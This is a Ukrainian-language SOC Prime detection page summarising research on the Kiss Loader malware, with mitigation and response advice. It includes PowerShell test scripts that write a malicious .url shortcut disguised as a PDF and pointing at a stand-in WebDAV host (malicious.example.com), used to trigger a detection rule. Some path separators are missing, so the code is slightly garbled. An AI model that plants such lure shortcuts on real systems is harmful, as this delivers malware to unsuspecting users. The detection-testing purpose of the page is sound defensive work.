SOC Prime Bias: Середній

26 Mar 2026 15:43
newspaper icon gdatasoftware.com

Коли зловмисне ПЗ відповідає: реальний інтерактив зі зловмисником під час аналізу Kiss Loader

Author Photo
Ruslan Mikhalov Керівник досліджень загроз у SOC Prime linkedin icon Стежити
Коли зловмисне ПЗ відповідає: реальний інтерактив зі зловмисником під час аналізу Kiss Loader
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

Дослідження від Центру Безпеки G DATA розглядає нововиявлений завантажувач під назвою Kiss Loader. Стаття досліджує нововиявлений завантажувач під назвою Kiss Loader, який поширюється через Windows ярлик, що вказує на WebDAV-репозиторій, відкрите через тунель TryCloudflare. Після запуску завантажувач розшифровує шеллкод, створений за допомогою Donut, отримує корисні навантаження, такі як VenomRAT та компонент Kryptik, і виконує їх через вприскування за методом Early Bird APC в explorer.exe. Під час аналізу дослідник зазнав прямої взаємодії з оператором шкідливого ПЗ через вікно Блокнота, що підтвердило використання методу вприскування Early Bird. Випадок підкреслює швидку еволюцію інструменту та необхідність сильної ізоляції при обробці активного шкідливого ПЗ.

Дослідження

Дослідники активували початковий ярлик у контрольованій лабораторії та простежили ланцюжок виконання через WSH-скрипт, компонент JScript, пакетні файли та завантажувач на основі Python. Вони підтвердили використання шеллкода, створеного за допомогою Donut, витягли вбудовані корисні навантаження та задокументували остаточний метод впуску, який ставить у чергу APC у призупинений explorer.exe процес. Під час сесії команда захопила детальний вихід часу виконання і повідомлення розробника, залишені в потоці шкідливого ПЗ. Короткий обмін в реальному часі з оператором додатково підтвердив як техніку, так і активний стан розробки завантажувача.

Пом’якшення

Організації повинні обмежити або перевіряти трафік WebDAV, доставлений через публічні тунельні платформи, такі як TryCloudflare, відключити автоматичне виконання .url ярликів, а також застосовувати суворий контроль виконання скриптів і пакетних файлів у шляхах автозавантаження, доступних користувачу. Захист кінцевої точки повинен виявляти поведінку ін’єкції Early Bird APC і контролювати призупинені процеси, які отримують у черзі APC. Списки дозволених застосунків також повинні бути актуальними для блокування невідомих завантажувачів Python і шеллкодів на базі Donut.

Реагування

Якщо виявлено активність Kiss Loader, негайно ізолюйте кінцеву точку, припиніть будь-які підозрілі explorer.exe процеси, запущені в призупиненому стані, і захопіть пам’ять для судово-експертного огляду. Розслідувачі повинні ідентифікувати та заблокувати пов’язану інфраструктуру WebDAV, сканувати хост на наявність VenomRAT, Kryptik та будь-яких додаткових скинутих корисних навантажень, а також змінити потенційно скомпрометовані облікові дані. Після цього повинен бути переглянутий журнал для інших спроб вторгнення, і правила виявлення мають бути оновлені з усіма новими спостережуваними показниками.

Потік атаки

Виконання симуляції

Передумова: має бути пройдена перевірка телеметрії та базової лінії Pre-flight.

  • Опис атаки та команди:
    Атакуючий з обмеженим доступом до робочої станції жертви хоче закріпитися для латерального руху. Вони створюють зловмисний ярлик Інтернету Windows під назвою DKM_DE000922.pdf.url який вказує на зловмисний спільний WebDAV-доступ (http://malicious.example.com/webdav/evil.pdf). Коли користувач двічі клацає ярлик, система автоматично намагається змонтувати WebDAV-ресурс, змушуючи жертву завантажити корисне навантаження без виконання традиційного двійкового файлу. Створення цього ярлика генерує подію створення файлу, що відповідає правилу виявлення.

    powershell
# Шлях, куди буде збережено ярлик (наприклад, на Робочому столі користувача)
$maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"

# Вміст зловмисного файлу .url, що вказує на WebDAV-доступ
$maliciousContent = @"
    [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@

    # Записати файл – ця дія повинна викликати правило виявлення
Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII

  • Скрипт тесту на регресію: Скрипт нижче відтворює точні кроки, необхідні для генерації телеметрії, що викликає тригер.

    powershell
# ---------------------------------------------------------
# Тест на регресію – Виклик правила Sigma для файлів WebDAV .url
# ---------------------------------------------------------

# 1. Визначити цільове місце (робочий стіл для поточного користувача)
$targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"

# 2. Зібрати вміст зловмисного ярлика
$urlPayload = @"
    [InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@

    # 3. Записати ярлик (це викличе подію створення файлу)
Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII

Write-Host "Створено зловмисний .url ярлик в $targetFile"

  • Команди очищення: Видалити зловмисний ярлик після перевірки.

    powershell
$maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url"
if (Test-Path $maliciousPath) {
    Remove-Item -Path $maliciousPath -Force
    Write-Host "Зловмисний ярлик було видалено."
} else {
    Write-Host "Зловмисний ярлик не знайдено; нічого очищати."
}

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно